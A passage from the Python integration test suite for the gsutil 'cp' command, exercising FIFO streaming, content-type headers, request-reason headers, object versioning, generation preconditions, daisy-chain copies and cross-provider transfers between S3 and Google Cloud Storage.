@SequentialAndParallelTransfer
def test_streaming_from_fifo_to_object(self):
bucket_uri = self.CreateBucket()
fifo_path = self.CreateTempFifo()
object_name = 'foo'
object_contents = b'bar'
list_for_output = []
# Start writer in the background, which won't finish until a corresponding
# read operation is performed on the fifo.
write_thread = threading.Thread(target=_WriteContentsToFifo,
args=(object_contents, fifo_path))
write_thread.start()
# The fifo requires both a pending read and write before either operation
# will complete. Regardless of which operation occurs first, the
# corresponding subsequent operation will unblock the first one.
# We run gsutil in a thread so that it can timeout rather than hang forever
# if the write thread fails.
read_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=((fifo_path,), suri(bucket_uri, object_name), list_for_output),
kwargs={'return_stderr': True})
read_thread.start()
read_thread.join(120)
write_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertIn('Copying from named pipe', list_for_output[0])
key_uri = self.StorageUriCloneReplaceName(bucket_uri, object_name)
self.assertEqual(key_uri.get_contents_as_string(), object_contents)
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
@SequentialAndParallelTransfer
def test_streaming_from_fifo_to_stdout(self):
fifo_path = self.CreateTempFifo()
contents = b'bar'
list_for_output = []
write_thread = threading.Thread(target=_WriteContentsToFifo,
args=(contents, fifo_path))
write_thread.start()
read_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=((fifo_path,), '-', list_for_output),
kwargs={'return_stdout': True})
read_thread.start()
read_thread.join(120)
write_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertEqual(list_for_output[0].strip().encode('ascii'), contents)
@unittest.skipIf(IS_WINDOWS, 'os.mkfifo not available on Windows.')
@SequentialAndParallelTransfer
def test_streaming_from_stdout_to_fifo(self):
fifo_path = self.CreateTempFifo()
contents = b'bar'
list_for_output = []
list_for_gsutil_output = []
read_thread = threading.Thread(target=_ReadContentsFromFifo,
args=(fifo_path, list_for_output))
read_thread.start()
write_thread = threading.Thread(
target=self._CpWithFifoViaGsUtilAndAppendOutputToList,
args=(('-',), fifo_path, list_for_gsutil_output),
kwargs={
'return_stderr': True,
'stdin': contents
})
write_thread.start()
write_thread.join(120)
read_thread.join(120)
if not list_for_output:
self.fail('Reading/writing to the fifo timed out.')
self.assertEqual(list_for_output[0].strip(), contents)
def test_streaming_multiple_arguments(self):
bucket_uri = self.CreateBucket()
stderr = self.RunGsUtil(['cp', '-', '-', suri(bucket_uri)],
stdin='bar',
return_stderr=True,
expected_status=1)
self.assertIn('Multiple URL strings are not supported with streaming',
stderr)
# TODO: Implement a way to test both with and without using magic file.
@SequentialAndParallelTransfer
def test_detect_content_type(self):
"""Tests local detection of content type."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
self.RunGsUtil(['cp', self._get_test_file('test.mp3'), dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
if IS_WINDOWS:
self.assertTrue(
re.search(r'Content-Type:\s+audio/x-mpg', stdout) or
re.search(r'Content-Type:\s+audio/mpeg', stdout))
else:
self.assertRegex(stdout, r'Content-Type:\s+audio/mpeg')
_Check1()
self.RunGsUtil(['cp', self._get_test_file('test.gif'), dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
_Check2()
def test_content_type_override_default(self):
"""Tests overriding content type with the default value."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
self.RunGsUtil(
['-h', 'Content-Type:', 'cp',
self._get_test_file('test.mp3'), dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+application/octet-stream')
_Check1()
self.RunGsUtil(
['-h', 'Content-Type:', 'cp',
self._get_test_file('test.gif'), dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+application/octet-stream')
_Check2()
def test_content_type_override(self):
"""Tests overriding content type with a value."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
self.RunGsUtil([
'-h', 'Content-Type:text/plain', 'cp',
self._get_test_file('test.mp3'), dsturi
])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+text/plain')
_Check1()
self.RunGsUtil([
'-h', 'Content-Type:text/plain', 'cp',
self._get_test_file('test.gif'), dsturi
])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+text/plain')
_Check2()
@unittest.skipIf(IS_WINDOWS, 'magicfile is not available on Windows.')
@SequentialAndParallelTransfer
def test_magicfile_override(self):
"""Tests content type override with magicfile value."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
fpath = self.CreateTempFile(contents=b'foo/bar\n')
self.RunGsUtil(['cp', fpath, dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
use_magicfile = boto.config.getbool('GSUtil', 'use_magicfile', False)
content_type = ('text/plain'
if use_magicfile else 'application/octet-stream')
self.assertRegex(stdout, r'Content-Type:\s+%s' % content_type)
_Check1()
@SequentialAndParallelTransfer
def test_content_type_mismatches(self):
"""Tests overriding content type when it does not match the file type."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
fpath = self.CreateTempFile(contents=b'foo/bar\n')
self.RunGsUtil([
'-h', 'Content-Type:image/gif', 'cp',
self._get_test_file('test.mp3'), dsturi
])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
_Check1()
self.RunGsUtil([
'-h', 'Content-Type:image/gif', 'cp',
self._get_test_file('test.gif'), dsturi
])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
_Check2()
self.RunGsUtil(['-h', 'Content-Type:image/gif', 'cp', fpath, dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check3():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
_Check3()
@SequentialAndParallelTransfer
def test_content_type_header_case_insensitive(self):
"""Tests that content type header is treated with case insensitivity."""
bucket_uri = self.CreateBucket()
dsturi = suri(bucket_uri, 'foo')
fpath = self._get_test_file('test.gif')
self.RunGsUtil(['-h', 'content-Type:text/plain', 'cp', fpath, dsturi])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+text/plain')
self.assertNotRegex(stdout, r'image/gif')
_Check1()
self.RunGsUtil([
'-h', 'CONTENT-TYPE:image/gif', '-h', 'content-type:image/gif', 'cp',
fpath, dsturi
])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
stdout = self.RunGsUtil(['ls', '-L', dsturi], return_stdout=True)
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
self.assertNotRegex(stdout, r'image/gif,\s*image/gif')
_Check2()
@SequentialAndParallelTransfer
def test_other_headers(self):
"""Tests that non-content-type headers are applied successfully on copy."""
bucket_uri = self.CreateBucket()
dst_uri = suri(bucket_uri, 'foo')
fpath = self._get_test_file('test.gif')
self.RunGsUtil([
'-h', 'Cache-Control:public,max-age=12', '-h',
'x-%s-meta-1:abcd' % self.provider_custom_meta, 'cp', fpath, dst_uri
])
stdout = self.RunGsUtil(['ls', '-L', dst_uri], return_stdout=True)
self.assertRegex(stdout, r'Cache-Control\s*:\s*public,max-age=12')
self.assertRegex(stdout, r'Metadata:\s*1:\s*abcd')
dst_uri2 = suri(bucket_uri, 'bar')
self.RunGsUtil(['cp', dst_uri, dst_uri2])
# Ensure metadata was preserved across copy.
stdout = self.RunGsUtil(['ls', '-L', dst_uri2], return_stdout=True)
self.assertRegex(stdout, r'Cache-Control\s*:\s*public,max-age=12')
self.assertRegex(stdout, r'Metadata:\s*1:\s*abcd')
@SequentialAndParallelTransfer
def test_request_reason_header(self):
"""Test that x-goog-request-header can be set using the environment variable."""
os.environ['CLOUDSDK_CORE_REQUEST_REASON'] = 'b/this_is_env_reason'
bucket_uri = self.CreateBucket()
dst_uri = suri(bucket_uri, 'foo')
fpath = self._get_test_file('test.gif')
# Ensure x-goog-request-header is set in cp command
stderr = self.RunGsUtil(['-D', 'cp', fpath, dst_uri], return_stderr=True)
self.assertRegex(stderr,
r'\'x-goog-request-reason\': \'b/this_is_env_reason\'')
# Ensure x-goog-request-header is set in ls command
stderr = self.RunGsUtil(['-D', 'ls', '-L', dst_uri], return_stderr=True)
self.assertRegex(stderr,
r'\'x-goog-request-reason\': \'b/this_is_env_reason\'')
@SequentialAndParallelTransfer
@SkipForXML('XML APIs use a different debug log format.')
def test_request_reason_header_persists_multiple_requests_json(self):
"""Test that x-goog-request-header works when cp sends multiple requests."""
os.environ['CLOUDSDK_CORE_REQUEST_REASON'] = 'b/this_is_env_reason'
bucket_uri = self.CreateBucket()
dst_uri = suri(bucket_uri, 'foo')
fpath = self._get_test_file('test.gif')
boto_config_for_test = ('GSUtil', 'resumable_threshold', '0')
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['-D', 'cp', fpath, dst_uri], return_stderr=True)
# PUT follows GET request. Both need the request-reason header.
reason_regex = (r'Making http GET[\s\S]*'
r'x-goog-request-reason\': \'b/this_is_env_reason[\s\S]*'
r'send: (b\')?PUT[\s\S]*x-goog-request-reason:'
r' b/this_is_env_reason')
self.assertRegex(stderr, reason_regex)
@SequentialAndParallelTransfer
@SkipForJSON('JSON API uses a different debug log format.')
def test_request_reason_header_persists_multiple_requests_xml(self):
"""Test that x-goog-request-header works when cp sends multiple requests."""
os.environ['CLOUDSDK_CORE_REQUEST_REASON'] = 'b/this_is_env_reason'
bucket_uri = self.CreateBucket()
dst_uri = suri(bucket_uri, 'foo')
fpath = self._get_test_file('test.gif')
boto_config_for_test = ('GSUtil', 'resumable_threshold', '0')
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil(['-D', 'cp', fpath, dst_uri], return_stderr=True)
reason_regex = (
r'Final headers: \{[\s\S]*\''
r'x-goog-request-reason\': \'b/this_is_env_reason\'[\s\S]*}')
# Pattern should match twice since two requests should have a reason header.
self.assertRegex(stderr, reason_regex + r'[\s\S]*' + reason_regex)
@SequentialAndParallelTransfer
def test_versioning(self):
"""Tests copy with versioning."""
bucket_uri = self.CreateVersionedBucket()
k1_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data2')
k2_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data1')
g1 = urigen(k2_uri)
self.RunGsUtil(['cp', suri(k1_uri), suri(k2_uri)])
k2_uri = self.StorageUriCloneReplaceName(bucket_uri, k2_uri.object_name)
k2_uri = self.StorageUriCloneReplaceKey(bucket_uri, k2_uri.get_key())
g2 = urigen(k2_uri)
self.StorageUriSetContentsFromString(k2_uri, 'data3')
g3 = urigen(k2_uri)
fpath = self.CreateTempFile()
# Check to make sure current version is data3.
self.RunGsUtil(['cp', k2_uri.versionless_uri, fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'data3')
# Check contents of all three versions
self.RunGsUtil(['cp', '%s#%s' % (k2_uri.versionless_uri, g1), fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'data1')
self.RunGsUtil(['cp', '%s#%s' % (k2_uri.versionless_uri, g2), fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'data2')
self.RunGsUtil(['cp', '%s#%s' % (k2_uri.versionless_uri, g3), fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'data3')
# Copy first version to current and verify.
self.RunGsUtil(
['cp',
'%s#%s' % (k2_uri.versionless_uri, g1), k2_uri.versionless_uri])
self.RunGsUtil(['cp', k2_uri.versionless_uri, fpath])
with open(fpath, 'rb') as f:
self.assertEqual(f.read(), b'data1')
# Attempt to specify a version-specific URI for destination.
stderr = self.RunGsUtil(['cp', fpath, k2_uri.uri],
return_stderr=True,
expected_status=1)
self.assertIn('cannot be the destination for gsutil cp', stderr)
def test_versioning_no_parallelism(self):
"""Tests that copy all-versions errors when parallelism is enabled."""
# TODO(b/135780661): Remove retry after bug resolved
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check():
stderr = self.RunGsUtil([
'-m', 'cp', '-A',
suri(self.nonexistent_bucket_name, 'foo'),
suri(self.nonexistent_bucket_name, 'bar')
],
expected_status=1,
return_stderr=True)
self.assertIn('-m option is not supported with the cp -A flag', stderr)
_Check()
@SkipForS3('S3 lists versioned objects in reverse timestamp order.')
def test_recursive_copying_versioned_bucket(self):
"""Tests cp -R with versioned buckets."""
bucket1_uri = self.CreateVersionedBucket()
bucket2_uri = self.CreateVersionedBucket()
bucket3_uri = self.CreateVersionedBucket()
# Write two versions of an object to the bucket1.
v1_uri = self.CreateObject(bucket_uri=bucket1_uri,
object_name='k',
contents=b'data0')
self.CreateObject(bucket_uri=bucket1_uri,
object_name='k',
contents=b'longer_data1',
gs_idempotent_generation=urigen(v1_uri))
self.AssertNObjectsInBucket(bucket1_uri, 2, versioned=True)
self.AssertNObjectsInBucket(bucket2_uri, 0, versioned=True)
self.AssertNObjectsInBucket(bucket3_uri, 0, versioned=True)
# Recursively copy to second versioned bucket.
# -A flag should copy all versions in order.
self.RunGsUtil(
['cp', '-R', '-A',
suri(bucket1_uri, '*'),
suri(bucket2_uri)])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check2():
"""Validates the results of the cp -R."""
listing1 = self.RunGsUtil(['ls', '-la', suri(bucket1_uri)],
return_stdout=True).split('\n')
listing2 = self.RunGsUtil(['ls', '-la', suri(bucket2_uri)],
return_stdout=True).split('\n')
# 2 lines of listing output, 1 summary line, 1 empty line from \n split.
self.assertEquals(len(listing1), 4)
self.assertEquals(len(listing2), 4)
# First object in each bucket should match in size and version-less name.
size1, _, uri_str1, _ = listing1[0].split()
self.assertEquals(size1, str(len('data0')))
self.assertEquals(storage_uri(uri_str1).object_name, 'k')
size2, _, uri_str2, _ = listing2[0].split()
self.assertEquals(size2, str(len('data0')))
self.assertEquals(storage_uri(uri_str2).object_name, 'k')
# Similarly for second object in each bucket.
size1, _, uri_str1, _ = listing1[1].split()
self.assertEquals(size1, str(len('longer_data1')))
self.assertEquals(storage_uri(uri_str1).object_name, 'k')
size2, _, uri_str2, _ = listing2[1].split()
self.assertEquals(size2, str(len('longer_data1')))
self.assertEquals(storage_uri(uri_str2).object_name, 'k')
_Check2()
# Recursively copy to second versioned bucket with no -A flag.
# This should copy only the live object.
self.RunGsUtil(['cp', '-R', suri(bucket1_uri, '*'), suri(bucket3_uri)])
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check3():
"""Validates the results of the cp -R."""
listing1 = self.RunGsUtil(['ls', '-la', suri(bucket1_uri)],
return_stdout=True).split('\n')
listing2 = self.RunGsUtil(['ls', '-la', suri(bucket3_uri)],
return_stdout=True).split('\n')
# 2 lines of listing output, 1 summary line, 1 empty line from \n split.
self.assertEqual(len(listing1), 4)
# 1 line of listing output, 1 summary line, 1 empty line from \n split.
self.assertEqual(len(listing2), 3)
# Live (second) object in bucket 1 should match the single live object.
size1, _, uri_str1, _ = listing2[0].split()
self.assertEqual(size1, str(len('longer_data1')))
self.assertEqual(storage_uri(uri_str1).object_name, 'k')
_Check3()
@SequentialAndParallelTransfer
@SkipForS3('Preconditions not supported for S3.')
def test_cp_generation_zero_match(self):
"""Tests that cp handles an object-not-exists precondition header."""
bucket_uri = self.CreateBucket()
fpath1 = self.CreateTempFile(contents=b'data1')
# Match 0 means only write the object if it doesn't already exist.
gen_match_header = 'x-goog-if-generation-match:0'
# First copy should succeed.
# TODO: This can fail (rarely) if the server returns a 5xx but actually
# commits the bytes. If we add restarts on small uploads, handle this
# case.
self.RunGsUtil(['-h', gen_match_header, 'cp', fpath1, suri(bucket_uri)])
# Second copy should fail with a precondition error.
stderr = self.RunGsUtil(
['-h', gen_match_header, 'cp', fpath1,
suri(bucket_uri)],
return_stderr=True,
expected_status=1)
self.assertIn('PreconditionException', stderr)
@SequentialAndParallelTransfer
@SkipForS3('Preconditions not supported for S3.')
def test_cp_v_generation_match(self):
"""Tests that cp -v option handles the if-generation-match header."""
bucket_uri = self.CreateVersionedBucket()
k1_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data1')
g1 = k1_uri.generation
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir, contents=b'data2')
gen_match_header = 'x-goog-if-generation-match:%s' % g1
# First copy should succeed.
self.RunGsUtil(['-h', gen_match_header, 'cp', fpath1, suri(k1_uri)])
# Second copy should fail the precondition.
stderr = self.RunGsUtil(
['-h', gen_match_header, 'cp', fpath1,
suri(k1_uri)],
return_stderr=True,
expected_status=1)
self.assertIn('PreconditionException', stderr)
# Specifying a generation with -n should fail before the request hits the
# server.
stderr = self.RunGsUtil(
['-h', gen_match_header, 'cp', '-n', fpath1,
suri(k1_uri)],
return_stderr=True,
expected_status=1)
self.assertIn('ArgumentException', stderr)
self.assertIn(
'Specifying x-goog-if-generation-match is not supported '
'with cp -n', stderr)
@SequentialAndParallelTransfer
def test_cp_nv(self):
"""Tests that cp -nv works when skipping existing file."""
bucket_uri = self.CreateVersionedBucket()
k1_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data1')
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir, contents=b'data2')
# First copy should succeed.
self.RunGsUtil(['cp', '-nv', fpath1, suri(k1_uri)])
# Second copy should skip copying.
stderr = self.RunGsUtil(
['cp', '-nv', fpath1, suri(k1_uri)], return_stderr=True)
self.assertIn('Skipping existing item:', stderr)
@SequentialAndParallelTransfer
@SkipForS3('S3 lists versioned objects in reverse timestamp order.')
def test_cp_v_option(self):
""""Tests that cp -v returns the created object's version-specific URI."""
bucket_uri = self.CreateVersionedBucket()
k1_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data1')
k2_uri = self.CreateObject(bucket_uri=bucket_uri, contents=b'data2')
# Case 1: Upload file to object using one-shot PUT.
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir, contents=b'data1')
self._run_cp_minus_v_test('-v', fpath1, k2_uri.uri)
# Case 2: Upload file to object using resumable upload.
size_threshold = ONE_KIB
boto_config_for_test = ('GSUtil', 'resumable_threshold',
str(size_threshold))
with SetBotoConfigForTest([boto_config_for_test]):
file_as_string = os.urandom(size_threshold)
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir, contents=file_as_string)
self._run_cp_minus_v_test('-v', fpath1, k2_uri.uri)
# Case 3: Upload stream to object.
self._run_cp_minus_v_test('-v', '-', k2_uri.uri)
# Case 4: Download object to file. For this case we just expect output of
# gsutil cp -v to be the URI of the file.
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir)
dst_uri = storage_uri(fpath1)
stderr = self.RunGsUtil(
['cp', '-v', suri(k1_uri), suri(dst_uri)], return_stderr=True)
# TODO: Add ordering assertion (should be in stderr.split('\n')[-2]) back
# once both the creation and status messages are handled by the UI thread.
self.assertIn('Created: %s\n' % dst_uri.uri, stderr)
# Case 5: Daisy-chain from object to object.
self._run_cp_minus_v_test('-Dv', k1_uri.uri, k2_uri.uri)
# Case 6: Copy object to object in-the-cloud.
self._run_cp_minus_v_test('-v', k1_uri.uri, k2_uri.uri)
def _run_cp_minus_v_test(self, opt, src_str, dst_str):
"""Runs cp -v with the options and validates the results."""
stderr = self.RunGsUtil(['cp', opt, src_str, dst_str], return_stderr=True)
match = re.search(r'Created: (.*)\n', stderr)
self.assertIsNotNone(match)
created_uri = match.group(1)
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', '-a', dst_str], return_stdout=True)
lines = stdout.split('\n')
# Final (most recent) object should match the "Created:" URI. This is
# in the second-to-last line (the last split element is empty from the trailing '\n').
self.assertGreater(len(lines), 2)
self.assertEqual(created_uri, lines[-2])
_Check1()
@SequentialAndParallelTransfer
def test_stdin_args(self):
"""Tests cp with the -I option."""
tmpdir = self.CreateTempDir()
fpath1 = self.CreateTempFile(tmpdir=tmpdir, contents=b'data1')
fpath2 = self.CreateTempFile(tmpdir=tmpdir, contents=b'data2')
bucket_uri = self.CreateBucket()
self.RunGsUtil(['cp', '-I', suri(bucket_uri)],
stdin='\n'.join((fpath1, fpath2)))
# Use @Retry as hedge against bucket listing eventual consistency.
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check1():
stdout = self.RunGsUtil(['ls', suri(bucket_uri)], return_stdout=True)
self.assertIn(os.path.basename(fpath1), stdout)
self.assertIn(os.path.basename(fpath2), stdout)
self.assertNumLines(stdout, 2)
_Check1()
def test_cross_storage_class_cloud_cp(self):
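"""Tests copy-in-the-cloud between buckets with different storage classes."""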
bucket1_uri = self.CreateBucket(storage_class='standard')
bucket2_uri = self.CreateBucket(
storage_class='durable_reduced_availability')
key_uri = self.CreateObject(bucket_uri=bucket1_uri, contents=b'foo')
# Server now allows copy-in-the-cloud across storage classes.
self.RunGsUtil(['cp', suri(key_uri), suri(bucket2_uri)])
@unittest.skipUnless(HAS_S3_CREDS, 'Test requires both S3 and GS credentials')
def test_cross_provider_cp(self):
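"""Tests copying objects between S3 and GS buckets."""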
s3_bucket = self.CreateBucket(provider='s3')
gs_bucket = self.CreateBucket(provider='gs')
s3_key = self.CreateObject(bucket_uri=s3_bucket, contents=b'foo')
gs_key = self.CreateObject(bucket_uri=gs_bucket, contents=b'bar')
self.RunGsUtil(['cp', suri(s3_key), suri(gs_bucket)])
self.RunGsUtil(['cp', suri(gs_key), suri(s3_bucket)])
@unittest.skipUnless(HAS_S3_CREDS, 'Test requires both S3 and GS credentials')
@unittest.skip('This test performs a large copy but remains here for '
'debugging purposes.')
def test_cross_provider_large_cp(self):
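"""Tests copying 1 MiB objects between S3 and GS buckets."""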
s3_bucket = self.CreateBucket(provider='s3')
gs_bucket = self.CreateBucket(provider='gs')
s3_key = self.CreateObject(bucket_uri=s3_bucket,
contents=b'f' * 1024 * 1024)
gs_key = self.CreateObject(bucket_uri=gs_bucket,
contents=b'b' * 1024 * 1024)
self.RunGsUtil(['cp', suri(s3_key), suri(gs_bucket)])
self.RunGsUtil(['cp', suri(gs_key), suri(s3_bucket)])
with SetBotoConfigForTest([('GSUtil', 'resumable_threshold', str(ONE_KIB)),
('GSUtil', 'json_resumable_chunk_size',
str(ONE_KIB * 256))]):
# Ensure copy also works across json upload chunk boundaries.
self.RunGsUtil(['cp', suri(s3_key), suri(gs_bucket)])
@unittest.skipUnless(HAS_S3_CREDS, 'Test requires both S3 and GS credentials')
def test_gs_to_s3_multipart_cp(self):
"""Ensure daisy_chain works for an object that is downloaded in 2 parts."""
s3_bucket = self.CreateBucket(provider='s3')
gs_bucket = self.CreateBucket(provider='gs', prefer_json_api=True)
num_bytes = int(_DEFAULT_DOWNLOAD_CHUNK_SIZE * 1.1)
gs_key = self.CreateObject(bucket_uri=gs_bucket,
contents=b'b' * num_bytes,
prefer_json_api=True)
self.RunGsUtil([
'-o', 's3:use-sigv4=True', '-o', 's3:host=s3.amazonaws.com', 'cp',
suri(gs_key),
suri(s3_bucket)
])
@unittest.skip('This test is slow due to creating many objects, '
'but remains here for debugging purposes.')
def test_daisy_chain_cp_file_sizes(self):
"""Ensure daisy chain cp works with a wide of file sizes."""
bucket_uri = self.CreateBucket()
bucket2_uri = self.CreateBucket()
exponent_cap = 28  # Up to 128 MiB (2**27) in size.
for i in range(exponent_cap):
one_byte_smaller = 2**i - 1
normal = 2**i
one_byte_larger = 2**i + 1
self.CreateObject(bucket_uri=bucket_uri, contents=b'a' * one_byte_smaller)
self.CreateObject(bucket_uri=bucket_uri, contents=b'b' * normal)
self.CreateObject(bucket_uri=bucket_uri, contents=b'c' * one_byte_larger)
self.AssertNObjectsInBucket(bucket_uri, exponent_cap * 3)
self.RunGsUtil(
['-m', 'cp', '-D',
suri(bucket_uri, '**'),
suri(bucket2_uri)])
self.AssertNObjectsInBucket(bucket2_uri, exponent_cap * 3)
def test_daisy_chain_cp(self):
"""Tests cp with the -D option."""
bucket1_uri = self.CreateBucket(storage_class='standard')
bucket2_uri = self.CreateBucket(
storage_class='durable_reduced_availability')
key_uri = self.CreateObject(bucket_uri=bucket1_uri, contents=b'foo')
# Set some headers on source object so we can verify that headers are
# preserved by daisy-chain copy.
self.RunGsUtil([
'setmeta', '-h', 'Cache-Control:public,max-age=12', '-h',
'Content-Type:image/gif', '-h',
'x-%s-meta-1:abcd' % self.provider_custom_meta,
suri(key_uri)
])
# Set public-read (non-default) ACL so we can verify that cp -D -p works.
self.RunGsUtil(['acl', 'set', 'public-read', suri(key_uri)])
acl_json = self.RunGsUtil(['acl', 'get', suri(key_uri)], return_stdout=True)
# Perform daisy-chain copy and verify that source object headers and ACL
# were preserved. Also specify -n option to test that gsutil correctly
# removes the x-goog-if-generation-match:0 header that was set at uploading
# time when updating the ACL.
stderr = self.RunGsUtil(
['cp', '-Dpn', suri(key_uri),
suri(bucket2_uri)], return_stderr=True)
self.assertNotIn('Copy-in-the-cloud disallowed', stderr)
@Retry(AssertionError, tries=3, timeout_secs=1)
def _Check():
uri = suri(bucket2_uri, key_uri.object_name)
stdout = self.RunGsUtil(['ls', '-L', uri], return_stdout=True)
self.assertRegex(stdout, r'Cache-Control:\s+public,max-age=12')
self.assertRegex(stdout, r'Content-Type:\s+image/gif')
self.assertRegex(stdout, r'Metadata:\s+1:\s+abcd')
new_acl_json = self.RunGsUtil(['acl', 'get', uri], return_stdout=True)
self.assertEqual(acl_json, new_acl_json)
_Check()
@unittest.skipUnless(
not HAS_GS_PORT, 'gs_port is defined in config which can cause '
'problems when uploading and downloading to the same local host port')
def test_daisy_chain_cp_download_failure(self):
"""Tests cp with the -D option when the download thread dies."""
bucket1_uri = self.CreateBucket()
bucket2_uri = self.CreateBucket()
key_uri = self.CreateObject(bucket_uri=bucket1_uri,
contents=b'a' * self.halt_size)
boto_config_for_test = ('GSUtil', 'resumable_threshold', str(ONE_KIB))
test_callback_file = self.CreateTempFile(
contents=pickle.dumps(HaltingCopyCallbackHandler(False, 5)))
with SetBotoConfigForTest([boto_config_for_test]):
stderr = self.RunGsUtil([
'cp', '--testcallbackfile', test_callback_file, '-D',
suri(key_uri),
suri(bucket2_uri)
],
expected_status=1,
return_stderr=True)
# Should have three exception traces; one from the download thread and
# two from the upload thread (exception message is repeated in main's
# _OutputAndExit).
self.assertEqual(
stderr.count(
'ResumableDownloadException: Artifically halting download'), 3)
def test_streaming_gzip_upload(self):
"""Tests error when compression flag is requested on a streaming source."""
bucket_uri = self.CreateBucket()
stderr = self.RunGsUtil(
['cp', '-Z', '-', suri(bucket_uri, 'foo')],
return_stderr=True,
expected_status=1,
stdin='streaming data')
self.assertIn(
'gzip compression is not currently supported on streaming uploads',
stderr)
def test_seek_ahead_upload_cp(self):
"""Tests that the seek-ahead iterator estimates total upload work."""
tmpdir = self.CreateTempDir(test_files=3)
bucket_uri = self.CreateBucket()
with SetBotoConfigForTest([('GSUtil', 'task_estimation_threshold', '1'),
('GSUtil', 'task_estimation_force', 'True')]):
stderr = self.RunGsUtil(
['-m', 'cp', '-r', tmpdir, suri(bucket_uri)], return_stderr=True)
self.assertIn(
'Estimated work for this command: objects: 3, total size: 18', stderr)
with SetBotoConfigForTest([('GSUtil', 'task_estimation_threshold', '0'),
('GSUtil', 'task_estimation_force', 'True')]):
stderr = self.RunGsUtil(
['-m', 'cp', '-r', tmpdir, suri(bucket_uri)], return_stderr=True)
self.assertNotIn('Estimated work', stderr)
def test_seek_ahead_download_cp(self):
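"""Tests that the seek-ahead iterator estimates total download work."""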
tmpdir = self.CreateTempDir()
bucket_uri = self.CreateBucket(test_objects=3)
self.AssertNObjectsInBucket(bucket_uri, 3)
with SetBotoConfigForTest([('GSUtil', 'task_estimation_threshold', '1'),
('GSUtil', 'task_estimation_force', 'True')]):
stderr = self.RunGsUtil(
